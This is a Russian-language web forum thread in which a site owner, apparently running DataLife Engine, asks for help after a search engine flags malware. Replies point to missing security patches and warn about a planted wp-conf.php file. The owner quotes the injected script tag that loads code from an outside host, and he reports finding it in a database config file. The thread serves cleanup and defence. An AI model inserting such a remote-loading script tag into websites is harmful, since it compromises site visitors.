Перейти к публикации

Рекомендованные сообщения

Привет всем ребят , делема у меня. Сёдня прислал яша что на моём сайте вредносный код. Проверил комп на вирусы,зачистил все куки , сменил пароли на фтп и админке. Вся фишка в исходной страницы сайта он есть

<script type="http://up.bot.nu/go/889"></script>

Но в в шаблоне сайта не где не могу найти его, на фтп тоже не замечаю, подскажите что делать ?

Мой сайт http://www.interbis.ru/

Изменено пользователем Farstrike
Ссылка на сообщение
Поделиться на других сайтах

как и чем искал в шаблоне то ?

уж если фраза есть, то быть она может только в двух местах: или шаблон - или БиДэ

из ниоткуда то ей никак не взяться

Ссылка на сообщение
Поделиться на других сайтах

Ещё момент , нашёл это код в engine/data/dbconfig удалил , теперь нужна помощь что бы залатать дыру . Как я понял это при регистрации , когда можно залить аватар. Дыра поидее сразу в трех файлах а именно в:

engine/inc/editusers.php

engine/modules/register.php

engine/modules/profile.php

Что же нужно сделать ? отключить полностью аватарки или есть другой способ???

Ссылка на сообщение
Поделиться на других сайтах

Farstrike,

Все необходимые патчи вышли еще несколько месяцев назад http://dle-news.ru/bags/ а у вас они не были установлены, в частности для этого не был установлен патч http://dle-news.ru/bags/v96/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

Ссылка на сообщение
Поделиться на других сайтах

дубль -2

участилось появление файлика wp-conf.php

или в корне - или в скриптах

лежит себе тихонечко, с разрешениями на запись и т.п.

следите за сайтами !

Изменено пользователем Klemanso
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...